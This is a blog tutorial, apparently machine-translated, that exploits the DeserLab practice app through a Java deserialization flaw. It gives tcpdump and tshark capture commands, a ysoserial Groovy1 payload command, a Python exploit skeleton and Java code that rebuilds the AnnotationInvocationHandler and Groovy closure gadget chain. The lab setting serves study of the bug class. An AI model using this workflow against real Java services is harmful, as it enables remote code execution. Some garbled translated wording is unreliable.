java deserialization vulnerability from understanding to practice

Posted by punzalan at 2020-02-29

I. Preface

In learning new things, we need to constantly remind ourselves that we have to be shallow on paper and never know that we should do it. That's why we have to put it into practice when we learn. In this article, we will deeply analyze the familiar Java serialization vulnerabilities. For us, the best practice is to really understand the knowledge at hand, and can be improved and utilized according to the actual needs. The main contents of this paper include the following two aspects:

1. Exploit a deserialization vulnerability.

2. Create and utilize the load manually.

More specifically, first of all, we will use the existing tools to actually operate the deserialization vulnerability, and also explain the specific meaning of the operation. Second, we will deeply analyze the load related content, such as what is the load and how to manually construct the load. After these steps are completed, we can fully understand the working principle of the load, and grasp the handling methods of the vulnerability when encountering similar vulnerabilities in the future.

The tools used in the whole process will be given in this article, but I suggest you first understand this tool:

The tool contains vulnerabilities that we are prepared to practice. The reason why we choose to use the simulated vulnerability rather than the actual target is that we can control the vulnerability from all aspects, so we can better understand the working principle of deserialization vulnerability utilization.

2、 Exploit the deserlab vulnerability

First of all, you can read this article written by Nick, which introduces deserlab and Java deserialization. This article details the Java serialization protocol. After reading this article, you should be able to handle the deserlab environment yourself. Next we need to use various precompiled jar tools, so we can download these tools from GitHub first. Now get ready to get to the point.

When I encounter a problem, it is my usual practice to understand the normal way the goal works first. For deserlab, we need to do the following:

Running server and client

Grab traffic

Understanding traffic

We can use the following commands to run the server and client:

java -jar DeserLab.jar -server 6666 java -jar DeserLab.jar -client 6666

The results of the above commands are as follows:

java -jar DeserLab.jar -server 6666 [+] DeserServer started, listening on [+] Connection accepted from [+] Sending hello... [+] Hello sent, waiting for hello from client... [+] Hello received from client... [+] Sending protocol version... [+] Version sent, waiting for version from client... [+] Client version is compatible, reading client name... [+] Client name received: testing [+] Hash request received, hashing: test [+] Hash generated: 098f6bcd4621d373cade4e832627b4f6 [+] Done, terminating connection. java -jar DeserLab.jar -client 6666 [+] DeserClient started, connecting to [+] Connected, reading server hello packet... [+] Hello received, sending hello to server... [+] Hello sent, reading server protocol version... [+] Sending supported protocol version to the server... [+] Enter a client name to send to the server: testing [+] Enter a string to hash: test [+] Generating hash of "test"... [+] Hash generated: 098f6bcd4621d373cade4e832627b4f6

The above results are not the information we want. The question we want to ask is how does this environment realize the deserialization function? To answer this question, we can use Wireshark, tcpdump or tshark to capture the traffic on port 6666. We can use the following command to capture traffic with tcpdump:

tcpdump -i lo -n -w deserlab.pcap 'port 6666'

Before continuing, you can use Wireshark to browse the pcap file. After reading Nick's article, you should already know the current situation, at least be able to identify the serialized Java objects hidden in the traffic.

2.1 extract serialized data

Based on these flows, we can be sure that there is serialized data in the network being transferred. Now let's analyze which data is being transferred. I chose to use the serializationdumper tool, which is one of the toolsets we are going to use, similar to jdeserialize, which is a well-known and still functional old tool. Before using these tools, we need to prepare the data to be processed, so we need to transform pcap into data format that can be analyzed.

tshark -r deserlab.pcap -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=, | grep -v ',,' | grep '^6666,' | cut -d',' -f2 | tr '\n' ':' | sed s/://g

The command looks long, but at least it works. We can break this command down into better understood subcommands, because the function of this command is to convert pcap data into a hexadecimal encoded line of output strings. First, the command converts pcap to text, which only contains the transmitted data, TCP source port number and destination port number:

tshark -r deserlab.pcap -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=,

The results are as follows:

50432,,6666 6666,,50432 50432,,6666 50432,aced0005,6666 6666,,50432 6666,aced0005,50432

As shown in the above results, no data is transmitted during the TCP three-way handshake, so you can see a text like ',,'. Then, the client sends the first byte, the server returns ACK message, and then sends back some byte data, and so on. The second function of the command is to continue to process the text and output the appropriate load according to the port and the beginning of each line:

| grep -v ',,' | grep '^6666,' | cut -d',' -f2 | tr '\n' ':' | sed s/://g

This filter command will extract the response data of the server. If you want to extract the client data, you need to change the port number. The results are as follows:


These data are exactly the data we need, it will send and receive data in a more concise way. We can use the two tools mentioned above to process this data. First, we use serializationdumper, and then we will use jdeserialize. The reason for this is that using multiple tools to handle the same task allows us to analyze potential errors or problems. If you insist on using a tool, you may walk into the wrong dead end. Of course, trying different tools is a very interesting thing in itself.

2.2 analyzing serialized data

The use of serializationdumper tool is very simple and straightforward. We only need to transfer the serialized data in hexadecimal form as the first parameter, as shown below:

java -jar SerializationDumper-v1.0.jar aced00057704f000baaa77020101

The results are as follows:

STREAM_MAGIC - 0xac ed STREAM_VERSION - 0x00 05 Contents TC_BLOCKDATA - 0x77 Length - 4 - 0x04 Contents - 0xf000baaa TC_BLOCKDATA - 0x77 Length - 2 - 0x02 Contents - 0x0101 TC_OBJECT - 0x73 TC_CLASSDESC - 0x72 className Length - 20 - 0x00 14 Value - nb.deser.HashRequest - 0x6e622e64657365722e4861736852657175657374

We need to compile to use the jdeserialize tool. The compilation task can be completed by using [ant] ( and the build.xml file. I choose to compile manually. The specific commands are as follows

mkdir build javac -d ./build/ src/* cd build jar cvf jdeserialize.jar *

The above command can generate jar files. You can use the following command to output help information to test whether the jar files have been generated correctly:

java -cp jdeserialize.jar org.unsynchronized.jdeserialize

Jdeserialize tool needs an input file, so we can use tools like Python to save the hexadecimal serialized data as a file, as shown below (I reduced the hexadecimal string for reading):


Next, we use the file name to be processed as the first parameter and pass it to the jdeserialize tool. The processing results are as follows:

java -cp jdeserialize.jar org.unsynchronized.jdeserialize rawser.bin read: [blockdata 0x00: 4 bytes] read: [blockdata 0x00: 2 bytes] read: nb.deser.HashRequest _h0x7e0002 = r_0x7e0000; //// BEGIN stream content output [blockdata 0x00: 4 bytes] [blockdata 0x00: 2 bytes] nb.deser.HashRequest _h0x7e0002 = r_0x7e0000; //// END stream content output //// BEGIN class declarations (excluding array classes) class nb.deser.HashRequest implements { java.lang.String dataToHash; java.lang.String theHash; } //// END class declarations //// BEGIN instance dump [instance 0x7e0002: 0x7e0000/nb.deser.HashRequest field data: 0x7e0000/nb.deser.HashRequest: dataToHash: r0x7e0003: [String 0x7e0003: "test"] theHash: r0x7e0004: [String 0x7e0004: "098f6bcd4621d373cade4e832627b4f6"] ] //// END instance dump

From the output of these two analysis tools, we can first confirm that this data is indeed serialized data. Second, we can confirm that a "NB. Der. Hashrequest" object is being transferred between the client and the server. Combined with the output results of the tool and the Wireshark packet capturing data, we can see that the user name is stored in the TC ﹣ blockdata type as a string for transmission:

TC_BLOCKDATA - 0x77 Length - 9 - 0x09 Contents - 0x000774657374696e67 '000774657374696e67'.decode('hex') '\x00\x07testing'

Now we are very familiar with the communication process between the client and the server of the deserlab. Next, we can use the ysoserial tool to take advantage of this process.

2.3 exploit vulnerability in deserlab

According to the analysis results of pcap and serialized data, we are very familiar with the communication process of the whole environment, so we can build our own Python script, which can embed ysoserial load. In order to keep the code simple and match the Wireshark data stream, I decided to implement this code in a way similar to Wireshark data stream, as follows:

mydeser = deser(myargs.targetip, myargs.targetport) mydeser.connect() mydeser.javaserial() mydeser.protohello() mydeser.protoversion() mydeser.clientname() mydeser.exploit(myargs.payloadfile)

You can find the full version of the code here. As you can see, the easiest way is to hard code all the Java deserialization exchange data into the code. You may have some questions about the specific writing method of the code, such as why 'myder. Exploit (myargs. Payloadfile)' is located after 'myder. Clientname()', and what I decide the specific location of the code. So I'd like to explain my thinking process, and by the way, how to generate and send ysoserial loads.

After reading several articles on Java deserialization (see resources for this article), I summarized two ideas:

1. Most of the vulnerabilities are related to the deserialization of Java objects;

2. Most of the vulnerabilities are related to deserialization of Java objects.

Just a joke. So if we check the information exchange process between the server and the client, we can find the exchange process of Java objects somewhere. We can easily find this target in the analysis results of the serialized data, because it either contains the "TC Dou object – 0 × 73" feature, or contains the following data:

//// BEGIN stream content output [blockdata 0x00: 4 bytes] [blockdata 0x00: 2 bytes] [blockdata 0x00: 9 bytes] nb.deser.HashRequest _h0x7e0002 = r_0x7e0000; //// END stream content output

From the above output, we can see that the last part of the flow data is the "NB. Deser. Hashrequest" object. The location to read this object is the last part of the exchange process, which also explains why the exploit function is at the end of the code. Now that we know where the exploit payload is stored, how can we generate and send the payload?

In fact, the code of deserlab itself does not contain anything available. The specific reasons will be explained below. Now we just need to accept this fact. This means that we need to find other libraries from which to mine code that can help us. The deserlab contains only one groovy library, which is enough to give us enough hints to generate ysoserial loads. In the real world, we often need to disassemble the unknown program library by ourselves to find useful code, which can also be called the gadget.

After mastering the library information, the generation of load will become very simple. The command is as follows:

java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping' > payload.bin

It should be noted that no response will be returned after the load is sent, so if we want to confirm whether the load is working properly, we need some methods to detect. In the experimental environment, a ping localhost command is enough, but in the actual environment, we need to find a better way.

Now everything is ready. Can we just send the load to achieve success? It's almost like this, but let's not forget that the Java serialization header exchange process has been completed before that, which means we need to remove the first four bytes of the load header, and then send the load:

./ 6666 payload_ping_localhost.bin 2017-09-07 22:58:05,401 - INFO - Connecting 2017-09-07 22:58:05,401 - INFO - java serialization handshake 2017-09-07 22:58:05,403 - INFO - protocol specific handshake 2017-09-07 22:58:05,492 - INFO - protocol specific version handshake 2017-09-07 22:58:05,571 - INFO - sending name of connected client 2017-09-07 22:58:05,571 - INFO - exploiting

If all goes well, you can see the following output:

sudo tcpdump -i lo icmp tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes 22:58:06.215178 IP localhost > localhost: ICMP echo request, id 31636, seq 1, length 64 22:58:06.215187 IP localhost > localhost: ICMP echo reply, id 31636, seq 1, length 64 22:58:07.215374 IP localhost > localhost: ICMP echo request, id 31636, seq 2, length 64

Very good. We have successfully exploited the vulnerability of deserlab. Next, we need to have a good understanding of the specific content of the load we sent to deserlab.

3、 Manual build load

To understand the working principle as like as two peas, the best way is to manually reconstruct the same load. That is to say, we need to write Java code. The question is, where do we need to start? As we did with pcap, let's look at the serialization payload. Using the following command, we can convert the payload to a hexadecimal string, and then we can use serializationdumper to analyze the string, or jdeserialize to analyze the file if you like.


Now we can have a deep analysis and understand the specific work process. In other words, you may find another article to explain the whole process in detail after you clear up these problems, so you can skip this part and read this article directly if you want. The following article focuses on the methods I use. In the method I use, it is very important to read the source code of the vulnerability exploitation part in ysoserial. I don't want to repeat that. If you wonder how I can find the specific workflow, I will let you read the implementation code of ysoserial.

After the load is passed to the tool for processing, both tools generate very long output information, including various Java class codes. Our main concern is the first class in the output information, named "sun. Reflect. Annotation. Annotationinvocationhandler". This class looks familiar because it is the entry point for many anti sequence exploits. I also noted other information, including "Java. Lang. reflect. Proxy," "org. Codehaus. Groovy. Runtime. Convergedclosure," and "org. Codehaus. Groovy. Runtime. Methodclosure.". The reason why these classes have attracted my attention is that they refer to the library we use to exploit the vulnerability. In addition, these classes are also mentioned in the article about Java deserialization vulnerability exploitation on the Internet. I have seen these classes in the ysoserial source code.

We need to pay attention to an important concept, that is, when you perform the deserialization attack operation, what you send is actually the "saved" state of an object. That is to say, you are totally dependent on the behavior mode of the receiver, and more specifically, you are dependent on the concrete operation that the receiver performs when deserializing the "saved" state you send. If the other end does not call any method in the object you send, you cannot achieve remote code execution. This means that the only thing you can change is the property information of the operands.

After clarifying these concepts, we know that if we want to achieve code execution effect, some method in the first class we send needs to be called automatically, which also explains why the first class is so important. If we look at the code of annotationinvocationhandler, we can see that its constructor accepts a object, and the readObject method calls a method on the map object. If you've read other articles, you'll know that the readObject method is called automatically when the data stream is deserialized. Based on this information, we can start to build our own exploit code from other article sources, as shown below. If you want to understand the code, you can first refer to the reflection mechanism in Java.

//this is the first class that will be deserialized String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler"; //access the constructor of the AnnotationInvocationHandler class final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0]; //normally the constructor is not accessible, so we need to make it accessible constructor.setAccessible(true);

You can use the following command to compile and run this code, although it has no actual function at present:

javac ManualPayloadGenerateBlog java ManualPayloadGenerateBlog

As you expand the capabilities of this code, keep the following in mind:

Please Google in time when encountering error code;

The class name should be consistent with the file name;

Please be familiar with Java language.

The above code can provide the available initial entry point classes and constructors, but what parameters do we need to pass to the constructors? In most cases, the following line of code will be used:

constructor.newInstance(Override.class, map); 

My understanding of the "map" parameter is that the "entryset" method of the map object is called during the first call to readObject. I don't particularly understand the internal working mechanism of the first parameter, but I know that the readObject method will check the parameter internally to confirm that the parameter is of type "annotationtype". We provide a "override" class for this parameter, which can meet the type requirements.

Now it's the point. To understand how the program works, we need to note that the second parameter is not a simple java map object, but a Java proxy object. When I first came across this fact, I didn't understand what it meant. There is a [article] ( that details the relevant content of the Java dynamic proxy mechanism, and also provides a very good example code. Part of the content of the article is excerpted as follows:

"With the dynamic proxy mechanism, a single class with only one method can use multiple call interfaces to serve any class with any number of methods. A dynamic proxy works like a facade layer, but you can think of it as a concrete implementation of any interface. After you drop the facade, you will find that the dynamic agent will direct all method calls to a single handler, the invoke () method. "

In a simple way, a proxy object can pretend to be a Java map object, and then direct all calls to the original map object to calls to a method of another class. Let's use a picture to sort it out:

This means that we can use this map object to expand our code as follows:

final Map map = (Map) Proxy.newProxyInstance(ManualPayloadGenerateBlog.class.getClassLoader(), new Class[] {Map.class}, <unknown-invocationhandler>); 

Note that we still need to match the invocationhandler in the code, which we haven't filled yet. This location is ultimately populated by groovy, and so far we're still in the realm of ordinary Java classes. Groovy fits this location because it contains an invocationhandler. Therefore, when invocationhandler is called, the program will finally guide us to achieve code execution effect, as shown below:

final Map map = (Map) Proxy.newProxyInstance(ManualPayloadGenerateBlog.class.getClassLoader(), new Class[] {Map.class}, closure);

As you can see, in the above code, we filled in a convertedclosure object in the invocationhandler. You can decompile the groovy library to confirm this. When you look at the convertedclosure class, you can see that it inherits (extends) from the conversionhandler class. Decompile this class, and you can see the following code:

public abstract class ConversionHandler implements InvocationHandler, Serializable

We can see from the code that conversionhandler implements invocationhandler, which is why we can use it in proxy objects. What I couldn't understand at the time was how the groovy payload implemented code execution through the map agent. You can use the decompiler to see the code in the groovy library, but usually I find it more efficient to use Google to search for key information. For example, in this case, we can search for the following keywords in Google:

“groovy execute shell command”

After searching the above keywords, we can find many articles to explain the problem, such as this article and this article. The point of these explanations is that the string object has an additional method called "execute.". I often use this query method to deal with those environments that I am not familiar with, because for developers, executing shell commands is usually a just need, and the relevant answers can often be found on the Internet. After understanding this, we can use a diagram to fully express the working principle of the load, as follows:

You can go to this link to get the full version of the code, and then compile and run it with the following command:

javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar java -cp .:DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate > payload_manual.bin

After running this code, we should be able to get the same results as the ysoserial payload. To my surprise, the hash values of these loads are exactly the same.

sha256sum payload_ping_localhost.bin payload_manual.bin 4c0420abc60129100e3601ba5426fc26d90f786ff7934fec38ba42e31cd58f07 payload_ping_localhost.bin 4c0420abc60129100e3601ba5426fc26d90f786ff7934fec38ba42e31cd58f07 payload_manual.bin

Thank you for reading this article. I hope that in the process of using java deserialization vulnerability, you can better understand the principle of vulnerability utilization.

*This article is reprinted from safe guest